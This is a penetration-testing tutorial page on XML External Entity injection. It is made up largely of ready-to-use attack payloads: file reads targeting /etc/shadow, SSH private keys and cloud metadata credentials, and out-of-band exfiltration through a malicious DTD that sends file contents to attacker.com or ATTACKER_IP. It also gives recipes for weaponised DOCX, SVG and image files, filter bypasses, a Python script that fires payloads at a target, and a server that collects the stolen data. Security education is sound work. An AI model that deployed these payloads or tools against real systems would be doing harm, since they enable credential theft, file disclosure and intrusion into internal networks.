Exploitation A05

XML External Entity (XXE) Injection

XXE attacks exploit XML parsers that process external entity references. This can lead to file disclosure, server-side request forgery, denial of service, and in some cases remote code execution.

Information

XXE vulnerabilities are common in legacy applications, SOAP services, and anywhere XML parsing occurs (file uploads, API endpoints, configuration processing).

🎯 Why XXE Remains a Critical Threat

Despite being well-known, XXE continues to appear in the OWASP Top 10 and causes major breaches:

  • SAML Authentication: XXE in SAML parsers can bypass SSO authentication entirely, affecting millions of users. Major identity providers have been vulnerable.
  • Office Documents: DOCX, XLSX, PPTX are ZIP files containing XML. Upload features processing these files are often vulnerable to XXE.
  • API Endpoints: Many APIs accept XML alongside JSON. Content-Type switching (JSON to XML) often reveals XXE in APIs thought to be JSON-only.
  • Supply Chain Risk: XML parsing libraries have default unsafe settings. Applications inherit vulnerabilities from dependencies.
  • Blind XXE Impact: Even without direct output, attackers can exfiltrate data via OOB channels (DNS, HTTP) or achieve SSRF to internal services.
  • DoS Potential: Billion Laughs attack can crash servers with minimal payload. Entity expansion can consume all available memory.

Tools & Resources

XXEinjector

Automated XXE exploitation with OOB support

ruby XXEinjector.rb GitHub →

oxml_xxe

Embed XXE in Office Open XML files (DOCX, XLSX)

python oxml_xxe.py GitHub →

docem

Create malicious Office/OpenDocument files

python docem.py GitHub →

Burp Collaborator

Detect blind XXE via OOB DNS/HTTP

Burp Suite Pro

interactsh

Free OOB server for blind XXE detection

go install interactsh-client@latest GitHub →

svg-xxe

XXE via SVG image upload

Manual crafting Examples →

Understanding XXE

XML allows defining entities (like variables) that can reference external resources. When parsers resolve these external references, attackers can read files, make network requests, or cause denial of service.

Basic XML Entity Syntax

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe "Hello World">
]>
<foo>&xxe;</foo>

<!-- Output: Hello World -->

<!-- External entity (reads file) -->
<!ENTITY xxe SYSTEM "file:///etc/passwd">

<!-- Parameter entity (used in DTD) -->
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">

Where to Find XXE

  • SOAP/XML web services
  • File uploads (SVG, DOCX, XLSX, XML)
  • RSS/Atom feed parsers
  • Configuration file processing
  • SAML authentication (XML-based)
  • PDF generators with XML input

File Disclosure

Basic File Read

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

<!-- Windows files -->
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
<!ENTITY xxe SYSTEM "file:///c:/windows/system32/drivers/etc/hosts">

<!-- Common targets -->
<!ENTITY xxe SYSTEM "file:///etc/shadow">
<!ENTITY xxe SYSTEM "file:///etc/hosts">
<!ENTITY xxe SYSTEM "file:///proc/self/environ">
<!ENTITY xxe SYSTEM "file:///home/user/.ssh/id_rsa">
<!ENTITY xxe SYSTEM "file:///var/www/html/config.php">

PHP Wrapper for Base64

xml
<!-- Use PHP filter to base64 encode (avoids XML parsing issues) -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<foo>&xxe;</foo>

<!-- Read PHP source code -->
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=config.php">
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">

Directory Listing (Java)

xml
<!-- Java allows directory listing with file: protocol -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/">
]>
<foo>&xxe;</foo>

<!-- Will list contents of /etc/ directory -->

SSRF via XXE

xml
<!-- Access internal services -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://internal-service/admin">
]>
<foo>&xxe;</foo>

<!-- Cloud metadata -->
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

<!-- Port scanning -->
<!ENTITY xxe SYSTEM "http://192.168.1.1:22/">
<!ENTITY xxe SYSTEM "http://192.168.1.1:3306/">

Blind XXE

When entity values aren't reflected in the response, use out-of-band techniques to exfiltrate data.

Out-of-Band Detection

xml
<!-- Trigger HTTP callback to confirm XXE -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://YOUR-ID.burpcollaborator.net/xxe-test">
]>
<foo>&xxe;</foo>

<!-- DNS callback -->
<!ENTITY xxe SYSTEM "http://YOUR-ID.oast.fun/">

Blind XXE with Parameter Entities

xml
<!-- Malicious payload to send to target -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<foo>test</foo>

<!-- evil.dtd hosted on attacker server -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;

Data Exfiltration via Error Messages

xml
<!-- Trigger error containing file contents -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<foo>test</foo>

<!-- evil.dtd - causes error with file contents -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

<!-- Error message will contain file contents -->

XXE via File Uploads

SVG Files

xml
<!-- malicious.svg -->
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

DOCX/XLSX Files

bash
# DOCX/XLSX are ZIP archives containing XML files
# Inject XXE into: [Content_Types].xml, word/document.xml, xl/workbook.xml

# Create malicious DOCX:
1. Create normal .docx file
2. Unzip: unzip document.docx -d extracted/
3. Inject XXE into word/document.xml:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://attacker.com/?xxe">
]>

4. Rezip: cd extracted && zip -r ../malicious.docx *
5. Upload the file

XMP Metadata in Images

bash
# Inject XXE into image XMP metadata
exiftool -XMP-x:XXE='<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/">]>' image.jpg

# Or create XML file with malicious XMP
<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<x:xmpmeta>&xxe;</x:xmpmeta>
<?xpacket end="w"?>

XXE in SAML

xml
<!-- SAML Response with XXE -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
  <saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
    <saml:Subject>
      <saml:NameID>&xxe;</saml:NameID>
    </saml:Subject>
  </saml:Assertion>
</samlp:Response>

<!-- Intercept SAML response in Burp and inject XXE -->

Bypass Techniques

When ENTITY is Blocked

xml
<!-- Use XInclude instead -->
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

<!-- HTML entities encoding -->
<!ENTITY xxe SYSTEM "file&#x3a;///etc/passwd">

<!-- UTF-7 encoding -->
+ADw-!DOCTYPE foo +AFs-
  +ADw-!ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI-+AD4-
+AF0-+AD4-

Alternative Protocols

text
<!-- Various protocols that may work -->
file:///etc/passwd
http://attacker.com/
https://attacker.com/
ftp://attacker.com/file.txt
gopher://attacker.com:6379/_*1%0d%0a
jar:http://attacker.com/evil.jar!/evil.txt
netdoc:///etc/passwd
php://filter/convert.base64-encode/resource=/etc/passwd
expect://id  (PHP expect module)

Automation Scripts

Python - XXE Tester

python
#!/usr/bin/env python3
"""
XXE Vulnerability Tester
Tests for XXE with various payloads
"""
import requests
import sys
import base64
from urllib.parse import urljoin

def generate_xxe_payloads(file_path="/etc/passwd", callback_url=None):
    """Generate XXE test payloads"""
    payloads = []
    
    # Basic file read
    payloads.append(f'''<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file://{file_path}">]>
<foo>&xxe;</foo>''')
    
    # PHP base64 wrapper
    payloads.append(f'''<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource={file_path}">]>
<foo>&xxe;</foo>''')
    
    # With callback for blind XXE
    if callback_url:
        payloads.append(f'''<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{callback_url}">]>
<foo>&xxe;</foo>''')
    
    # XInclude
    payloads.append(f'''<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file://{file_path}"/>
</foo>''')
    
    return payloads

def test_xxe(url, payloads, content_type="application/xml"):
    """Send XXE payloads to target"""
    results = []
    
    for i, payload in enumerate(payloads):
        try:
            response = requests.post(
                url,
                data=payload,
                headers={"Content-Type": content_type},
                timeout=10
            )
            
            # Check for file content indicators
            indicators = ["root:", "bin/bash", "[extensions]", "daemon:"]
            
            for indicator in indicators:
                if indicator in response.text:
                    print(f"[+] XXE VULNERABLE! Payload #{i+1}")
                    results.append({
                        "payload": payload,
                        "response": response.text[:500]
                    })
                    break
            
            # Check for base64 encoded content
            try:
                decoded = base64.b64decode(response.text.strip()).decode()
                if any(ind in decoded for ind in indicators):
                    print(f"[+] XXE VULNERABLE (Base64)! Payload #{i+1}")
                    print(f"    Decoded: {decoded[:200]}")
                    results.append({
                        "payload": payload,
                        "response_decoded": decoded[:500]
                    })
            except:
                pass
                
        except Exception as e:
            print(f"[-] Payload #{i+1} error: {e}")
    
    return results

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <url> [file_path] [callback_url]")
        print(f"Example: {sys.argv[0]} http://target.com/api/xml /etc/passwd")
        sys.exit(1)
    
    url = sys.argv[1]
    file_path = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
    callback = sys.argv[3] if len(sys.argv) > 3 else None
    
    print(f"[*] Testing XXE on {url}")
    payloads = generate_xxe_payloads(file_path, callback)
    results = test_xxe(url, payloads)
    
    if results:
        print(f"\n[+] Found {len(results)} successful XXE injection(s)")
    else:
        print("\n[-] No XXE vulnerability detected (try blind XXE with callback)")

Blind XXE Server (Python)

python
#!/usr/bin/env python3
"""
Blind XXE OOB Server
Hosts malicious DTD and receives exfiltrated data
"""
from http.server import HTTPServer, BaseHTTPRequestHandler
import sys
from urllib.parse import urlparse, parse_qs, unquote

class XXEHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        parsed = urlparse(self.path)
        
        # Serve malicious DTD
        if parsed.path == "/evil.dtd":
            dtd = '''<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKER_IP:8888/exfil?data=%file;'>">
%eval;
%exfil;'''
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.end_headers()
            self.wfile.write(dtd.encode())
            print(f"[*] Served DTD to {self.client_address[0]}")
        
        # Receive exfiltrated data
        elif parsed.path.startswith("/exfil"):
            params = parse_qs(parsed.query)
            if 'data' in params:
                data = unquote(params['data'][0])
                print(f"\n[+] EXFILTRATED DATA:\n{data}")
            self.send_response(200)
            self.end_headers()
        
        else:
            print(f"[*] Request from {self.client_address[0]}: {self.path}")
            self.send_response(200)
            self.end_headers()
    
    def log_message(self, format, *args):
        pass  # Suppress default logging

if __name__ == "__main__":
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 8888
    server = HTTPServer(('0.0.0.0', port), XXEHandler)
    print(f"[*] XXE OOB Server running on port {port}")
    print(f"[*] DTD URL: http://YOUR_IP:{port}/evil.dtd")
    print(f"\n[*] Send this payload to target:")
    print(f'''<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://YOUR_IP:{port}/evil.dtd">%xxe;]>
<foo>test</foo>''')
    server.serve_forever()

Practice Labs

XXE Testing Checklist

🔍 Discovery Phase

  • ☐ Identify XML-accepting endpoints (Content-Type: application/xml)
  • ☐ Test file upload for Office docs (DOCX, XLSX, PPTX)
  • ☐ Test SVG image upload functionality
  • ☐ Check SOAP/WSDL services
  • ☐ Look for SAML authentication
  • ☐ Try Content-Type switch (JSON to XML)

📂 File Disclosure

  • ☐ Test basic file:// protocol
  • ☐ Try PHP wrappers (php://filter/convert.base64-encode)
  • ☐ Test for directory listing (Java)
  • ☐ Read common sensitive files (/etc/passwd, config files)
  • ☐ Try Windows paths (c:/windows/win.ini)
  • ☐ Check for source code disclosure

🔗 Blind XXE / OOB

  • ☐ Test parameter entities with external DTD
  • ☐ Set up OOB server (interactsh/Burp Collaborator)
  • ☐ Try DNS exfiltration
  • ☐ Test HTTP-based exfiltration
  • ☐ Check error-based XXE (entity error messages)
  • ☐ Try FTP exfiltration channel

⚡ Advanced Attacks

  • ☐ Test SSRF via XXE (internal services, cloud metadata)
  • ☐ Try billion laughs DoS (carefully!)
  • ☐ Test XInclude injection
  • ☐ Check for RCE via expect:// (PHP)
  • ☐ Test local DTD file inclusion
  • ☐ Examine entity encoding bypass

How to Exploit XXE

Step-by-Step Exploitation

  1. Find XML Input: Look for endpoints accepting XML, file uploads (SVG, DOCX), or try Content-Type switching from JSON to XML.
  2. Test Basic Entity: First confirm entity processing works with internal entity: <!ENTITY test "Hello"> and &test;
  3. Try External Entity: If entities work, try <!ENTITY xxe SYSTEM "file:///etc/passwd"> - look for file contents in response.
  4. Blind Detection: If no output, use external DTD with OOB: <!ENTITY % xxe SYSTEM "http://your-server/evil.dtd">%xxe;
  5. Data Exfiltration: Create evil.dtd that sends data via DNS/HTTP: <!ENTITY % data SYSTEM "file:///etc/passwd"> then send to your server.
  6. SSRF Pivot: Use XXE to access internal services: <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
  7. Escalate: Try reading SSH keys, config files with credentials, or accessing internal admin panels via SSRF.

💡 Pro Tip: If file contents break XML parsing (special chars), use PHP wrappers to base64 encode: php://filter/convert.base64-encode/resource=/etc/passwd

External Resources